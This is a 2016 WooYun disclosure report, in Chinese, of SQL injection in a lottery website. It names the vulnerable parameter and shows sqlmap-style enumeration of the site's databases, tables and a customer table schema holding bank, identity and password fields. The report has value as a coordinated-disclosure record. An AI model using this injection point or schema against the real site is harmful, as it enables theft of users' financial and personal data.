当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203729

漏洞标题:APP安全之一CAIPIAO存在SQL注入(220W+用户信息泄露/姓名/城市/银行)

相关厂商:一彩票

漏洞作者: Exploit DB

提交时间:2016-04-30 12:40

修复时间:2016-06-19 19:50

公开时间:2016-06-19 19:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

我也来一发 不知道重复没~

详细说明:

http://**.**.**.**/news/newslist.php?categoryId=15


QQ截图20160425193331.png


available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tubiao
Database: caiso
[86 tables]
+------------------------------+
| account |
| accountlog |
| activity_activities |
| activity_activity_detail |
| admin_channel |
| admin_class |
| admin_permissions |
| admin_role |
| admin_role_function |
| admin_sendsomething_template |
| admin_syslogs |
| admin_user |
| admin_winprize |
| agent |
| bankcardInfo |
| business_activity_partner |
| business_article |
| business_article_category |
| business_article_inlink |
| business_article_partner |
| business_back_money_request |
| business_chase |
| business_chaseitem |
| business_city_no |
| business_community |
| business_company |
| business_cps_day_report |
| business_customer |
| business_customer_commission |
| business_email |
| business_email_log |
| business_feedback |
| business_filedownlod |
| business_friendly_link |
| business_league |
| business_league_rank |
| business_match_arrange |
| business_match_history |
| business_match_mapping |
| business_match_team_mapping |
| business_mobile |
| business_odd |
| business_order |
| business_order_queue |
| business_order_temp |
| business_part |
| business_partner |
| business_pay |
| business_pay_out_request |
| business_payment_request |
| business_plan |
| business_plan_item |
| business_print_term |
| business_prize_level |
| business_recharge_gift |
| business_restricted |
| business_sms_log |
| business_sms_mo_log |
| business_sms_partner |
| business_soft_update |
| business_spread_channel |
| business_supplier |
| business_sys_account |
| business_sys_account_log |
| business_system_param |
| business_team |
| business_term |
| business_term_type_config |
| business_ticket |
| business_wallet |
| business_wallet_log |
| business_win_describe_order |
| business_win_describe_ticket |
| business_win_prize |
| business_you_hui_ma |
| member |
| memberinfo |
| memberlog |
| membershare |
| mibaoinfo |
| odds |
| point |
| pointlog |
| sequence |
| sessions |
| sm_queue |
+------------------------------+


QQ截图20160425193331.png


Database: caiso
Table: business_customer
[52 columns]
+--------------------+---------------+
| Column | Type |
+--------------------+---------------+
| admin_user_id | bigint(20) |
| all_win_money | decimal(19,2) |
| ask | varchar(255) |
| bank | int(11) |
| bank_name | varchar(255) |
| bank_number | varchar(255) |
| bound | varchar(255) |
| channel_id | bigint(20) |
| city | varchar(255) |
| commission_id | bigint(20) |
| credent_no | varchar(255) |
| credent_type | int(11) |
| customer_ip | varchar(255) |
| customer_type | int(11) |
| email | varchar(255) |
| email_accept | varchar(255) |
| id | bigint(20) |
| is_apply | bit(1) |
| is_pass | int(11) |
| last_login_time | datetime |
| login_num | int(11) |
| mobile_no | varchar(255) |
| nick_name | varchar(255) |
| old | int(11) |
| open_id | varchar(255) |
| password | varchar(255) |
| ploy_accur | bigint(20) |
| ploy_consumed | bigint(20) |
| province | varchar(255) |
| question | varchar(255) |
| real_name | varchar(255) |
| reg_channel | int(11) |
| reg_source | int(11) |
| register_time | datetime |
| remarks | varchar(255) |
| sms_accept | varchar(255) |
| sssuper_commission | decimal(19,2) |
| sssuper_ratio | decimal(19,2) |
| sssuperior | bigint(20) |
| ssuper_commission | decimal(19,2) |
| ssuper_ratio | decimal(19,2) |
| ssuperior_id | bigint(20) |
| status | int(11) |
| subbranch | varchar(255) |
| super_commission | decimal(19,2) |
| super_ratio | decimal(19,2) |
| superior_id | bigint(20) |
| user3_id | varchar(255) |
| usr_type | int(11) |
| wake_up_email_num | int(11) |
| wallet_id | bigint(20) |
| yanzhenma | varchar(255) |
+--------------------+---------------+


时间问题 不继续深入了~

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-05 19:48

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无